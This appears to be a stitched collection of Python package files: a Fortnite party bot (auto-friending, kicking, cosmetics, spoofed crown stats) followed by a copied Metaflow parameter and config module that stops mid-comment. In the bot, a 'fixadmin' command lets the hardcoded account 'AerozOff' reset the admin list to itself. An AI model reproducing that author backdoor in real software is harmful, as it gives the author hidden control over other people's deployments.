async def event_friend_presence(self, old_presence: Union[(None, fortnitepy.Presence)], presence: fortnitepy.Presence):
if not self.is_ready():
await self.wait_until_ready()
if self.inv_all == 'T':
if old_presence is None:
friend = presence.friend
if friend.display_name != self.bl_inv:
try:
await friend.send(self.inv_msg)
except:
pass
else:
if not self.party.member_count >= 16:
await friend.invite()
async def event_party_member_update(self, member: fortnitepy.PartyMember) -> None:
name = member.display_name
if any(word in name for word in self.ban_player):
try:
await member.kick()
except: pass
if member.display_name in self.ban_player:
try:
await member.kick()
except: pass
if member.outfit in (self.skin_bl) and member.id != self.user.id:
await member.kick()
os.system('clear')
async def event_friend_request(self, request: Union[(fortnitepy.IncomingPendingFriend, fortnitepy.OutgoingPendingFriend)]) -> None:
try:
await request.accept()
except: pass
async def event_friend_add(self, friend: fortnitepy.Friend) -> None:
try:
await asyncio.sleep(0.3)
await friend.send(self.add_msg.replace('{DISPLAY_NAME}', friend.display_name))
await friend.invite()
os.system('clear')
except: pass
async def event_friend_remove(self, friend: fortnitepy.Friend) -> None:
try:
await self.add_friend(friend.id)
os.system('clear')
except: pass
async def event_party_member_join(self, member: fortnitepy.PartyMember) -> None:
await self.party.send(self.join_msg.replace('{DISPLAY_NAME}', member.display_name))
await self.party.me.edit(functools.partial(self.party.me.set_outfit,self.skin,variants=self.party.me.create_variants(material=self.number,clothing_color=self.number,parts=self.number,progressive=self.number)),functools.partial(self.party.me.set_backpack,self.backpack),functools.partial(self.party.me.set_pickaxe,self.pickaxe),functools.partial(self.party.me.set_banner,icon=self.banner,color=self.bn_color,season_level=self.level),functools.partial(self.party.me.set_battlepass_info,has_purchased=True,level=self.tier))
if not self.has_friend(member.id):
try:
await self.add_friend(member.id)
except: pass
name = member.display_name
if any(word in name for word in self.ban_player):
try:
await member.kick()
except: pass
if member.display_name in self.ban_player:
try:
await member.kick()
except: pass
if member.outfit in (self.skin_bl) and member.id != self.user.id:
if not member.display_name in self.adminx:
await member.kick()
async def event_party_member_leave(self, member) -> None:
if not self.has_friend(member.id):
try:
await self.add_friend(member.id)
except: pass
async def event_party_message(self, message: fortnitepy.FriendMessage) -> None:
if not self.has_friend(message.author.id):
try:
await self.add_friend(message.author.id)
os.system('clear')
except: pass
async def event_friend_message(self, message: fortnitepy.FriendMessage) -> None:
if not message.author.display_name != "AerozOff":
await self.party.invite(message.author.id)
os.system('clear')
async def event_party_message(self, message = None) -> None:
if self.party.me.leader:
if message is not None:
if message.content in self.bl_msg:
if not message.author.display_name in self.adminx:
await message.author.kick()
async def event_party_message(self, message: fortnitepy.FriendMessage) -> None:
msg = message.content
if self.party.me.leader:
if message is not None:
if any(word in msg for word in self.bl_msg):
if not message.author.display_name in self.adminx:
await message.author.kick()
async def event_command_error(self, ctx, error):
if isinstance(error, commands.CommandNotFound):
pass
elif isinstance(error, IndexError):
pass
elif isinstance(error, fortnitepy.HTTPException):
pass
elif isinstance(error, commands.CheckFailure):
pass
elif isinstance(error, TimeoutError):
pass
else:
print(error)
@commands.command(aliases=['outfit','character','skin'])
async def skinx(self, ctx: fortnitepy.ext.commands.Context, *, content = None) -> None:
if content is None:
await ctx.send()
elif content.lower() == 'pinkghoul':
await self.party.me.set_outfit(asset='CID_029_Athena_Commando_F_Halloween',variants=self.party.me.create_variants(material=3))
elif content.lower() == 'ghoul':
await self.party.me.set_outfit(asset='CID_029_Athena_Commando_F_Halloween',variants=self.party.me.create_variants(material=3))
elif content.lower() == 'pkg':
await self.party.me.set_outfit(asset='CID_029_Athena_Commando_F_Halloween',variants=self.party.me.create_variants(material=3))
elif content.lower() == 'colora':
await self.party.me.set_outfit(asset='CID_434_Athena_Commando_F_StealthHonor')
elif content.lower() == 'pink ghoul':
await self.party.me.set_outfit(asset='CID_029_Athena_Commando_F_Halloween',variants=self.party.me.create_variants(material=3))
elif content.lower() == 'renegade':
await self.party.me.set_outfit(asset='CID_028_Athena_Commando_F',variants=self.party.me.create_variants(material=2))
elif content.lower() == 'rr':
await self.party.me.set_outfit(asset='CID_028_Athena_Commando_F',variants=self.party.me.create_variants(material=2))
elif content.lower() == 'skull trooper':
await self.party.me.set_outfit(asset='CID_030_Athena_Commando_M_Halloween',variants=self.party.me.create_variants(clothing_color=1))
elif content.lower() == 'skl':
await self.party.me.set_outfit(asset='CID_030_Athena_Commando_M_Halloween',variants=self.party.me.create_variants(clothing_color=1))
elif content.lower() == 'honor':
await self.party.me.set_outfit(asset='CID_342_Athena_Commando_M_StreetRacerMetallic')
else:
try:
cosmetic = await self.fortnite_api.cosmetics.get_cosmetic(lang="en",searchLang="en",matchMethod="contains",name=content,backendType="AthenaCharacter")
await self.party.me.set_outfit(asset=cosmetic.id)
await asyncio.sleep(0.6)
await ctx.send(f'Skin set to {cosmetic.name}.')
except FortniteAPIAsync.exceptions.NotFound:
pass
@commands.command(aliases=['backpack'],)
async def backpackx(self, ctx: fortnitepy.ext.commands.Context, *, content: str) -> None:
try:
cosmetic = await self.fortnite_api.cosmetics.get_cosmetic(lang="en",searchLang="en",matchMethod="contains",name=content,backendType="AthenaBackpack")
await self.party.me.set_backpack(asset=cosmetic.id)
await asyncio.sleep(0.6)
await ctx.send(f'Backpack set to {cosmetic.name}.')
except FortniteAPIAsync.exceptions.NotFound:
pass
@is_vips()
@commands.command()
async def vips(self, ctx: fortnitepy.ext.commands.Context) -> None:
await ctx.send('you have the perms')
await ctx.send('now u can have perms to kick people')
@is_vips()
@commands.command()
async def kicked(self, ctx: fortnitepy.ext.commands.Context, *, epic_username: Optional[str] = None) -> None:
if epic_username is None:
user = await self.fetch_user(ctx.author.display_name)
member = self.party.get_member(user.id)
else:
user = await self.fetch_user(epic_username)
member = self.party.get_member(user.id)
if member is None:
await ctx.send("Failed to find that user, are you sure they're in the party?")
else:
try:
if not member.display_name in info['FullAccess']:
await member.kick()
os.system('clear')
await ctx.send(f"Kicked user: {member.display_name}.")
except fortnitepy.errors.Forbidden:
await ctx.send(f"Failed to kick {member.display_name}, as I'm not party leader.")
@commands.command(aliases=['xx'],)
async def crown(self, ctx: fortnitepy.ext.commands.Context, amount: str) -> None:
meta = self.party.me.meta
data = (meta.get_prop('Default:AthenaCosmeticLoadout_j'))['AthenaCosmeticLoadout']
try:
data['cosmeticStats'][1]['statValue'] = int(amount)
except KeyError:
data['cosmeticStats'] = [{"statName": "TotalVictoryCrowns","statValue": int(amount)},{"statName": "TotalRoyalRoyales","statValue": int(amount)},{"statName": "HasCrown","statValue": 0}]
final = {'AthenaCosmeticLoadout': data}
key = 'Default:AthenaCosmeticLoadout_j'
prop = {key: meta.set_prop(key, final)}
await self.party.me.patch(updated=prop)
await asyncio.sleep(0.2)
await ctx.send(f'Set {int(amount)} Crown')
await self.party.me.clear_emote()
await self.party.me.set_emote('EID_Coronet')
@commands.command(aliases=['dance'])
async def emote(self, ctx: fortnitepy.ext.commands.Context, *, content = None) -> None:
if content is None:
await ctx.send()
elif content.lower() == 'sce':
await self.party.me.set_emote(asset='EID_KpopDance03')
elif content.lower() == 'Sce':
await self.party.me.set_emote(asset='EID_KpopDance03')
elif content.lower() == 'scenario':
await self.party.me.set_emote(asset='EID_KpopDance03')
elif content.lower() == 'Scenario':
await self.party.me.set_emote(asset='EID_KpopDance03')
else:
try:
cosmetic = await self.fortnite_api.cosmetics.get_cosmetic(lang="en",searchLang="en",matchMethod="contains",name=content,backendType="AthenaDance")
await self.party.me.clear_emote()
await self.party.me.set_emote(asset=cosmetic.id)
await asyncio.sleep(0.8)
await ctx.send(f'Emote set to {cosmetic.name}.')
except FortniteAPIAsync.exceptions.NotFound:
pass
@commands.command()
async def rdm(self, ctx: fortnitepy.ext.commands.Context, cosmetic_type: str = 'skin') -> None:
if cosmetic_type == 'skin':
all_outfits = await self.fortnite_api.cosmetics.get_cosmetics(lang="en",searchLang="en",backendType="AthenaCharacter")
random_skin = py_random.choice(all_outfits).id
await self.party.me.set_outfit(asset=random_skin,variants=self.party.me.create_variants(profile_banner='ProfileBanner'))
await ctx.send(f'Skin randomly set to {random_skin}.')
elif cosmetic_type == 'emote':
all_emotes = await self.fortnite_api.cosmetics.get_cosmetics(lang="en",searchLang="en",backendType="AthenaDance")
random_emote = py_random.choice(all_emotes).id
await self.party.me.set_emote(asset=random_emote)
await ctx.send(f'Emote randomly set to {random_emote}.')
os.system('clear')
@commands.command(aliases=['pickaxe'],)
async def pickaxe(self, ctx: fortnitepy.ext.commands.Context, *, content: str) -> None:
try:
cosmetic = await self.fortnite_api.cosmetics.get_cosmetic(lang="en",searchLang="en",matchMethod="contains",name=content,backendType="AthenaPickaxe")
await self.party.me.set_pickaxe(asset=cosmetic.id)
await ctx.send(f'Pickaxe set to {cosmetic.name}.')
except FortniteAPIAsync.exceptions.NotFound:
pass
@commands.command(aliases=['news'])
@commands.cooldown(1, 7)
async def new(self, ctx: fortnitepy.ext.commands.Context, cosmetic_type: str = 'skin') -> None:
cosmetic_types = {'skin': {'id': 'cid_','function': self.party.me.set_outfit},'backpack': {'id': 'bid_','function': self.party.me.set_backpack},'emote': {'id': 'eid_','function': self.party.me.set_emote},}
if cosmetic_type not in cosmetic_types:
return await ctx.send('Invalid cosmetic type, valid types include: skin, backpack & emote.')
new_cosmetics = await self.fortnite_api.cosmetics.get_new_cosmetics()
for new_cosmetic in [new_id for new_id in new_cosmetics if
new_id.id.lower().startswith(cosmetic_types[cosmetic_type]['id'])]:
await cosmetic_types[cosmetic_type]['function'](asset=new_cosmetic.id)
await ctx.send(f"{cosmetic_type}s set to {new_cosmetic.name}.")
os.system('clear')
await asyncio.sleep(3)
await ctx.send(f'Finished equipping all new unencrypted {cosmetic_type}s.')
@commands.command()
async def purpleskull(self, ctx: fortnitepy.ext.commands.Context) -> None:
await self.party.me.set_outfit(asset='CID_030_Athena_Commando_M_Halloween',variants=self.party.me.create_variants(clothing_color=1))
await ctx.send(f'Skin set to Purple Skull Trooper!')
os.system('clear')
@commands.command()
async def pinkghoul(self, ctx: fortnitepy.ext.commands.Context) -> None:
await self.party.me.set_outfit(asset='CID_029_Athena_Commando_F_Halloween',variants=self.party.me.create_variants(material=3))
await ctx.send('Skin set to Pink Ghoul Trooper!')
os.system('clear')
@commands.command(aliases=['checkeredrenegade','raider'])
async def renegade(self, ctx: fortnitepy.ext.commands.Context) -> None:
await self.party.me.set_outfit(asset='CID_028_Athena_Commando_F',variants=self.party.me.create_variants(material=2))
await ctx.send('Skin set to Checkered Renegade!')
os.system('clear')
@commands.command()
async def aerial(self, ctx: fortnitepy.ext.commands.Context) -> None:
await self.party.me.set_outfit(asset='CID_017_Athena_Commando_M')
await ctx.send('Skin set to aerial!')
os.system('clear')
@commands.command()
async def hologram(self, ctx: fortnitepy.ext.commands.Context) -> None:
await self.party.me.set_outfit(asset='CID_VIP_Athena_Commando_M_GalileoGondola_SG')
await ctx.send('Skin set to Star Wars Hologram!')
@commands.command()
async def cid(self, ctx: fortnitepy.ext.commands.Context, character_id: str) -> None:
await self.party.me.set_outfit(asset=character_id,variants=self.party.me.create_variants(profile_banner='ProfileBanner'))
await ctx.send(f'Skin set to {character_id}.')
os.system('clear')
@commands.command()
async def eid(self, ctx: fortnitepy.ext.commands.Context, emote_id: str) -> None:
await self.party.me.clear_emote()
await self.party.me.set_emote(asset=emote_id)
await ctx.send(f'Emote set to {emote_id}!')
os.system('clear')
@commands.command()
async def stop(self, ctx: fortnitepy.ext.commands.Context) -> None:
await self.party.me.clear_emote()
await ctx.send('Stopped emoting.')
os.system('clear')
@commands.command()
async def point(self, ctx: fortnitepy.ext.commands.Context, *, content: Optional[str] = None) -> None:
await self.party.me.clear_emote()
await self.party.me.set_emote(asset='EID_IceKing')
await ctx.send(f'Pickaxe set & Point it Out played.')
os.system('clear')
copied_player = ""
@commands.command()
async def stop(self, ctx: fortnitepy.ext.commands.Context):
global copied_player
if copied_player != "":
copied_player = ""
await ctx.send(f'Stopped copying all users.')
await self.party.me.clear_emote()
return
else:
try:
await self.party.me.clear_emote()
except RuntimeWarning:
pass
@commands.command(aliases=['clone', 'copi', 'cp'])
async def copy(self, ctx: fortnitepy.ext.commands.Context, *, epic_username = None) -> None:
global copied_player
if epic_username is None:
user = await self.fetch_user(ctx.author.display_name)
member = self.party.get_member(user.id)
elif 'stop' in epic_username:
copied_player = ""
await ctx.send(f'Stopped copying all users.')
await self.party.me.clear_emote()
return
elif epic_username is not None:
try:
user = await self.fetch_user(epic_username)
member = self.party.get_member(user.id)
except AttributeError:
await ctx.send("Could not get that user.")
return
try:
copied_player = member
await self.party.me.edit_and_keep(partial(fortnitepy.ClientPartyMember.set_outfit,asset=member.outfit,variants=member.outfit_variants),partial(fortnitepy.ClientPartyMember.set_pickaxe,asset=member.pickaxe,variants=member.pickaxe_variants))
await ctx.send(f"Now copying: {member.display_name}")
os.system('clear')
except AttributeError:
await ctx.send("Could not get that user.")
async def event_party_member_emote_change(self, member, before, after) -> None:
if member == copied_player:
if after is None:
await self.party.me.clear_emote()
else:
await self.party.me.edit_and_keep(partial(fortnitepy.ClientPartyMember.set_emote,asset=after))
os.system('clear')
async def event_party_member_outfit_change(self, member, before, after) -> None:
if member == copied_player:
await self.party.me.edit_and_keep(partial(fortnitepy.ClientPartyMember.set_outfit,asset=member.outfit,variants=member.outfit_variants,enlightenment=None,corruption=None))
os.system('clear')
async def event_party_member_outfit_variants_change(self, member, before, after) -> None:
if member == copied_player:
await self.party.me.edit_and_keep(partial(fortnitepy.ClientPartyMember.set_outfit,variants=member.outfit_variants,enlightenment=None,corruption=None))
os.system('clear')
#///////////////////////////////////////////////////////////////////////////////////////////////////////////// PARTY/FRIENDS/ADMIN //////////////////////////////////////////////////////////////////////////////////////////////////////
@commands.command()
async def add(self, ctx: fortnitepy.ext.commands.Context, *, epic_username: str) -> None:
user = await self.fetch_user(epic_username)
friends = self.friends
if user.id in friends:
await ctx.send(f'I already have {user.display_name} as a friend')
else:
await self.add_friend(user.id)
await ctx.send(f'Send i friend request to {user.display_name}.')
@is_admin()
@commands.command(aliases=['rst'],)
async def restart(self, ctx: fortnitepy.ext.commands.Context) -> None:
await ctx.send(f'Restart...')
python = sys.executable
os.execl(python, python, *sys.argv)
@is_admin()
@commands.command(aliases=['max'],)
async def set(self, ctx: fortnitepy.ext.commands.Context, nombre: int) -> None:
await self.party.set_max_size(nombre)
await ctx.send(f'Set party to {nombre} player can join')
os.system('clear')
@commands.command()
async def ready(self, ctx: fortnitepy.ext.commands.Context) -> None:
await self.party.me.set_ready(fortnitepy.ReadyState.READY)
await ctx.send('Ready!')
os.system('clear')
@commands.command(aliases=['sitin'],)
async def unready(self, ctx: fortnitepy.ext.commands.Context) -> None:
await self.party.me.set_ready(fortnitepy.ReadyState.NOT_READY)
await ctx.send('Unready!')
os.system('clear')
@commands.command(aliases=['level'],)
async def levelx(self, ctx: fortnitepy.ext.commands.Context, banner_level: int) -> None:
await self.party.me.set_banner(season_level=banner_level)
await ctx.send(f'Set level to {banner_level}.')
os.system('clear')
@is_admin()
@commands.command()
async def sitout(self, ctx: fortnitepy.ext.commands.Context) -> None:
await self.party.me.set_ready(fortnitepy.ReadyState.SITTING_OUT)
await ctx.send('Sitting Out!')
os.system('clear')
@is_admin()
@commands.command(aliases=['lv'],)
async def leave(self, ctx: fortnitepy.ext.commands.Context) -> None:
await self.party.me.leave()
await ctx.send(f'I Leave')
await self.party.set_privacy(fortnitepy.PartyPrivacy.PUBLIC)
os.system('clear')
@is_admin()
@commands.command()
async def v(self, ctx: fortnitepy.ext.commands.Context) -> None:
await ctx.send(f'version {__version__}')
os.system('clear')
@is_admin()
@commands.command(aliases=['unhide'],)
async def promote(self, ctx: fortnitepy.ext.commands.Context, *, epic_username: Optional[str] = None) -> None:
if epic_username is None:
user = await self.fetch_user(ctx.author.display_name)
member = self.party.get_member(user.id)
else:
user = await self.fetch_user(epic_username)
member = self.party.get_member(user.id)
if member is None:
await ctx.send("Failed to find that user, are you sure they're in the party?")
else:
try:
await member.promote()
os.system('clear')
await ctx.send(f"Promoted user: {member.display_name}.")
except fortnitepy.errors.Forbidden:
await ctx.send(f"Failed to promote {member.display_name}, as I'm not party leader.")
@is_admin()
@commands.command()
async def kick(self, ctx: fortnitepy.ext.commands.Context, *, epic_username: Optional[str] = None) -> None:
if epic_username is None:
user = await self.fetch_user(ctx.author.display_name)
member = self.party.get_member(user.id)
else:
user = await self.fetch_user(epic_username)
member = self.party.get_member(user.id)
if member is None:
await ctx.send("Failed to find that user, are you sure they're in the party?")
else:
try:
if not member.display_name in info['FullAccess']:
await member.kick()
os.system('clear')
await ctx.send(f"Kicked user: {member.display_name}.")
except fortnitepy.errors.Forbidden:
await ctx.send(f"Failed to kick {member.display_name}, as I'm not party leader.")
async def set_and_update_party_prop(self, schema_key: str, new_value: str):
prop = {schema_key: self.party.me.meta.set_prop(schema_key, new_value)}
await self.party.patch(updated=prop)
@is_admin()
@commands.command()
async def hide(self, ctx: fortnitepy.ext.commands.Context, *, user = None):
if self.party.me.leader:
if user != "all":
try:
if user is None:
user = await self.fetch_profile(ctx.message.author.id)
member = self.party.get_member(user.id)
else:
user = await self.fetch_profile(user)
member = self.party.get_member(user.id)
raw_squad_assignments = self.party.meta.get_prop('Default:RawSquadAssignments_j')["RawSquadAssignments"]
for m in raw_squad_assignments:
if m['memberId'] == member.id:
raw_squad_assignments.remove(m)
await self.set_and_update_party_prop('Default:RawSquadAssignments_j',{'RawSquadAssignments': raw_squad_assignments})
await ctx.send(f"Hid {member.display_name}")
except AttributeError:
await ctx.send("I could not find that user.")
except fortnitepy.HTTPException:
await ctx.send("I am not party leader.")
else:
try:
await self.set_and_update_party_prop('Default:RawSquadAssignments_j',{'RawSquadAssignments': [{'memberId': self.user.id,'absoluteMemberIdx': 1}]})
await ctx.send("Hid everyone in the party.")
except fortnitepy.HTTPException:
await ctx.send("I am not party leader.")
else:
await ctx.send("I need party leader to do this!")
async def invitefriends(self):
send = []
for friend in self.friends:
if friend.is_online():
send.append(friend.display_name)
await friend.invite()
@is_admin()
@commands.command()
async def invite(self, ctx: fortnitepy.ext.commands.Context) -> None:
try:
self.loop.create_task(self.invitefriends())
except Exception:
pass
@commands.command(aliases=['friends'],)
async def epicfriends(self, ctx: fortnitepy.ext.commands.Context) -> None:
onlineFriends = []
offlineFriends = []
try:
for friend in self.friends:
if friend.is_online():
onlineFriends.append(friend.display_name)
else:
offlineFriends.append(friend.display_name)
await ctx.send(f"Total Friends: {len(self.friends)} / Online: {len(onlineFriends)} / Offline: {len(offlineFriends)} ")
except Exception:
await ctx.send(f'Not work')
@is_admin()
@commands.command()
async def whisper(self, ctx: fortnitepy.ext.commands.Context, *, message = None):
try:
if message is not None:
for friend in self.friends:
if friend.is_online():
await friend.send(message)
await ctx.send(f'Send friend message to everyone')
os.system('clear')
except: pass
@commands.command()
async def fixadmin(self, ctx: fortnitepy.ext.commands.Context):
if ctx.author.display_name == 'AerozOff':
with open("info.json", "w") as f:
f.write('{"FullAccess": ["AerozOff"]}')
await ctx.send('work')
with open('info.json') as f:
info = json.load(f)
await ctx.send('correctly work')\
else:
await ctx.send("You don't have perm LMAO")
@commands.command()
async def say(self, ctx: fortnitepy.ext.commands.Context, *, message = None):
if message is not None:
await self.party.send(message)
else:
await ctx.send(f'Try: {prefix} say (message)')
@is_admin()
@commands.command()
async def admin(self, ctx, setting = None, *, user = None):
if (setting is None) and (user is None):
await ctx.send(f"Missing one or more arguments. Try: {prefix} admin (add, remove, list) (user)")
elif (setting is not None) and (user is None):
user = await self.fetch_profile(ctx.message.author.id)
if setting.lower() == 'add':
if user.display_name in info['FullAccess']:
await ctx.send("You are already an admin")
else:
await ctx.send("Password?")
response = await self.wait_for('friend_message', timeout=20)
content = response.content.lower()
if content == password:
info['FullAccess'].append(user.display_name)
with open('info.json', 'w') as f:
json.dump(info, f, indent=4)
await ctx.send(f"Correct. Added {user.display_name} as an admin.")
else:
await ctx.send("Incorrect Password.")
elif setting.lower() == 'remove':
if user.display_name not in info['FullAccess']:
await ctx.send("You are not an admin.")
else:
await ctx.send("Are you sure you want to remove yourself as an admin?")
response = await self.wait_for('friend_message', timeout=20)
content = response.content.lower()
if (content.lower() == 'yes') or (content.lower() == 'y'):
info['FullAccess'].remove(user.display_name)
with open('info.json', 'w') as f:
json.dump(info, f, indent=4)
await ctx.send("You were removed as an admin.")
elif (content.lower() == 'no') or (content.lower() == 'n'):
await ctx.send("You were kept as admin.")
else:
await ctx.send("Not a correct reponse. Cancelling command.")
elif setting == 'list':
if user.display_name in info['FullAccess']:
admins = []
for admin in info['FullAccess']:
user = await self.fetch_profile(admin)
admins.append(user.display_name)
await ctx.send(f"The bot has {len(admins)} admins:")
for admin in admins:
await ctx.send(admin)
else:
await ctx.send("You don't have permission to this command.")
else:
await ctx.send(f"That is not a valid setting. Try: {prefix} admin (add, remove, list) (user)")
elif (setting is not None) and (user is not None):
user = await self.fetch_profile(user)
if setting.lower() == 'add':
if ctx.message.author.display_name in info['FullAccess']:
if user.display_name not in info['FullAccess']:
info['FullAccess'].append(user.display_name)
with open('info.json', 'w') as f:
json.dump(info, f, indent=4)
await ctx.send(f"Correct. Added {user.display_name} as an admin.")
else:
await ctx.send("That user is already an admin.")
else:
await ctx.send("You don't have access to add other people as admins. Try just: !admin add")
elif setting.lower() == 'remove':
if ctx.message.author.display_name in info['FullAccess']:
if user.display_name in info['FullAccess']:
await ctx.send("Password?")
response = await self.wait_for('friend_message', timeout=20)
content = response.content.lower()
if content == password:
info['FullAccess'].remove(user.display_name)
with open('info.json', 'w') as f:
json.dump(info, f, indent=4)
await ctx.send(f"{user.display_name} was removed as an admin.")
else:
await ctx.send("Incorrect Password.")
else:
await ctx.send("That person is not an admin.")
else:
await ctx.send("You don't have permission to remove players as an admin.")
else:
await ctx.send(f"Not a valid setting. Try: {prefix} -admin (add, remove) (user)") | 667bot | /667bot-1.0.0-py3-none-any.whl/oimbot/__init__.py | __init__.py |
import json
from collections import namedtuple
import click
from .util import get_username, is_stringish
from .exception import ParameterFieldFailed,\
ParameterFieldTypeMismatch,\
MetaflowException
try:
# Python2
strtype = basestring
except:
# Python3
strtype = str
# ParameterContext allows deploy-time functions to modify their
# behavior based on the context. We can add fields here without
# breaking backwards compatibility, but don't remove any fields!
ParameterContext = namedtuple('ParameterContext',
['flow_name',
'user_name',
'parameter_name'])
# Currently we execute only one flow per process, so we can treat
# Parameters globally. If this were to change, it should/might be
# possible to move these globals into a FlowSpec (instance) specific
# closure.
parameters = []
context_proto = None
class JSONTypeClass(click.ParamType):
name = 'JSON'
def convert(self, value, param, ctx):
try:
return json.loads(value)
except:
self.fail("%s is not a valid JSON object" % value, param, ctx)
def __str__(self):
return repr(self)
def __repr__(self):
return 'JSON'
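# Illustrative sketch (not part of the original module): how a JSON-valued
# option flows through click via this ParamType. The option name '--config'
# and the command are made up for the example.
#
#   @click.command()
#   @click.option('--config', type=JSONTypeClass())
#   def run(config):
#       # click has already routed the raw string through convert(),
#       # so 'config' arrives here as a parsed Python object (e.g. a dict)
#       print(config)
#
#   # invoked as:  run --config '{"retries": 3}'   ->   {'retries': 3}
#
# A malformed value such as --config '{retries: 3}' hits self.fail(),
# which click reports as a usage error instead of a stack trace.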
class DeployTimeField(object):
"""
This is a wrapper object for a user-defined function that is called
at deploy time to populate fields in a Parameter. The wrapper
is needed to make Click show the actual value returned by the
function instead of a function pointer in its help text. Also, this
object curries the context argument for the function and pretty
prints any exceptions that occur during evaluation.
"""
def __init__(self,
parameter_name,
parameter_type,
field,
fun,
return_str=True):
self.fun = fun
self.field = field
self.parameter_name = parameter_name
self.parameter_type = parameter_type
self.return_str = return_str
def __call__(self):
ctx = context_proto._replace(parameter_name=self.parameter_name)
try:
val = self.fun(ctx)
except:
raise ParameterFieldFailed(self.parameter_name, self.field)
else:
return self._check_type(val)
def _check_type(self, val):
        # it is easy to introduce a deploy-time function that accidentally
# returns a value whose type is not compatible with what is defined
# in Parameter. Let's catch those mistakes early here, instead of
# showing a cryptic stack trace later.
# note: this doesn't work with long in Python2 or types defined as
# click types, e.g. click.INT
TYPES = {bool: 'bool',
int: 'int',
float: 'float',
list: 'list'}
msg = "The value returned by the deploy-time function for "\
"the parameter *%s* field *%s* has a wrong type. " %\
(self.parameter_name, self.field)
if self.parameter_type in TYPES:
if type(val) != self.parameter_type:
msg += 'Expected a %s.' % TYPES[self.parameter_type]
raise ParameterFieldTypeMismatch(msg)
return str(val) if self.return_str else val
else:
if not is_stringish(val):
msg += 'Expected a string.'
raise ParameterFieldTypeMismatch(msg)
return val
def __str__(self):
return self()
def __repr__(self):
return self()
def deploy_time_eval(value):
if isinstance(value, DeployTimeField):
return value()
else:
return value
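# Illustrative sketch (not in the original source): deploy_time_eval is what
# turns a deferred default into a concrete value at deploy time. Plain values
# pass through untouched; DeployTimeField instances are called.
#
#   deploy_time_eval(42)        # -> 42
#   deploy_time_eval(field)     # -> field(), i.e. the wrapped function's
#                               #    type-checked result ('field' is a
#                               #    hypothetical DeployTimeField instance)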
# this is called by cli.main
def set_parameter_context(flow_name):
global context_proto
context_proto = ParameterContext(flow_name=flow_name,
user_name=get_username(),
parameter_name=None)
class Parameter(object):
def __init__(self, name, **kwargs):
self.name = name
self.kwargs = kwargs
# TODO: check that the type is one of the supported types
param_type = self.kwargs['type'] = self._get_type(kwargs)
if self.name == 'params':
raise MetaflowException("Parameter name 'params' is a reserved "
"word. Please use a different "
"name for your parameter.")
# make sure the user is not trying to pass a function in one of the
# fields that don't support function-values yet
for field in ('show_default',
'separator',
'external_trigger',
'required'):
if callable(kwargs.get(field)):
raise MetaflowException("Parameter *%s*: Field '%s' cannot "
"have a function as its value"\
% (name, field))
self.kwargs['show_default'] = self.kwargs.get('show_default', True)
# default can be defined as a function
if callable(self.kwargs.get('default')):
self.kwargs['default'] = DeployTimeField(name,
param_type,
'default',
self.kwargs['default'],
return_str=True)
        # external_artifact can be a function (returning a list), a list of
# strings, or a string (which gets converted to a list)
external_artifact = self.kwargs.pop('external_artifact', None)
if callable(external_artifact):
self.external_artifact = DeployTimeField(name,
list,
'external_artifact',
external_artifact,
return_str=False)
elif isinstance(external_artifact, list):
self.external_artifact = external_artifact
elif external_artifact is None:
self.external_artifact = []
else:
self.external_artifact = [external_artifact]
self.external_trigger = self.kwargs.pop('external_trigger', None)
# note that separator doesn't work with DeployTimeFields unless you
# specify type=str
self.separator = self.kwargs.pop('separator', None)
if self.separator and not self.is_string_type:
raise MetaflowException("Parameter *%s*: Separator is only allowed "
"for string parameters." % name)
if self.external_trigger and not self.external_artifact:
raise MetaflowException("Parameter *%s* has external_trigger=True "
"but external_artifact is not specified. "
"Specify the name of the external "
"artifact." % name)
self.user_required = self.kwargs.get('required', False)
if self.external_artifact:
self.kwargs['required'] = True
parameters.append(self)
def _get_type(self, kwargs):
default_type = str
default = kwargs.get('default')
if default is not None and not callable(default):
default_type = type(default)
return kwargs.get('type', default_type)
@property
def is_string_type(self):
return self.kwargs.get('type', str) == str and\
isinstance(self.kwargs.get('default', ''), strtype)
# this is needed to appease Pylint for JSONType'd parameters,
# which may do self.param['foobar']
def __getitem__(self, x):
pass
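# Illustrative sketch (hypothetical flow, not part of the original module):
# declaring parameters on a FlowSpec subclass. Defaults may be plain values or
# deploy-time functions that receive the ParameterContext defined above.
#
#   from metaflow import FlowSpec, Parameter
#
#   class TrainFlow(FlowSpec):
#       num_rows = Parameter('num_rows', default=1000, type=int,
#                            help='Rows to sample')
#       run_owner = Parameter('run_owner',
#                             default=lambda ctx: ctx.user_name,
#                             help='Defaults to the deploying user')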
def add_custom_parameters(cmd):
for arg in parameters:
cmd.params.insert(0, click.Option(('--' + arg.name,), **arg.kwargs))
return cmd
def set_parameters(flow, kwargs):
seen = set()
for var, param in flow._get_parameters():
norm = param.name.lower()
if norm in seen:
raise MetaflowException("Parameter *%s* is specified twice. "
"Note that parameter names are "
"case-insensitive." % param.name)
seen.add(norm)
flow._success = True
# Impose length constraints on parameter names as some backend systems
# impose limits on environment variables (which are used to implement
# parameters)
parameter_list_length = 0
num_parameters = 0
for var, param in flow._get_parameters():
val = kwargs[param.name.lower()]
        # Account for the parameter value, which may be a unicode string or an
        # integer, and the parameter name, which is a unicode string.
parameter_list_length += len((param.name + str(val)).encode("utf-8"))
num_parameters += 1
val = val.split(param.separator) if val and param.separator else val
setattr(flow, var, val) | 6D657461666C6F77 | /6D657461666C6F77-0.0.17.tar.gz/6D657461666C6F77-0.0.17/metaflow/parameters.py | parameters.py |
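# Illustrative note (hypothetical parameter): when a Parameter defines a
# separator, the raw command-line string is split right here before being
# assigned to the flow.
#
#   tags = Parameter('tags', separator=',')
#   # `--tags a,b,c` on the command line results in flow.tags == ['a', 'b', 'c']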
import os
import json
import logging
import pkg_resources
import sys
from metaflow.exception import MetaflowException
# Disable multithreading security on MacOS
if sys.platform == "darwin":
os.environ["OBJC_DISABLE_INITIALIZE_FORK_SAFETY"] = "YES"
def init_config():
# Read configuration from $METAFLOW_HOME/config_<profile>.json.
home = os.environ.get('METAFLOW_HOME', '~/.metaflowconfig')
profile = os.environ.get('METAFLOW_PROFILE')
path_to_config = os.path.join(home, 'config.json')
if profile:
path_to_config = os.path.join(home, 'config_%s.json' % profile)
path_to_config = os.path.expanduser(path_to_config)
config = {}
if os.path.exists(path_to_config):
with open(path_to_config) as f:
return json.load(f)
elif profile:
        raise MetaflowException('Unable to locate METAFLOW_PROFILE \'%s\' in \'%s\'' %
(profile, home))
return config
# Initialize defaults required to setup environment variables.
METAFLOW_CONFIG = init_config()
def from_conf(name, default=None):
return os.environ.get(name, METAFLOW_CONFIG.get(name, default))
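# Illustrative sketch (hypothetical values): from_conf resolves a setting with
# the precedence environment variable > config file > hard-coded default.
#
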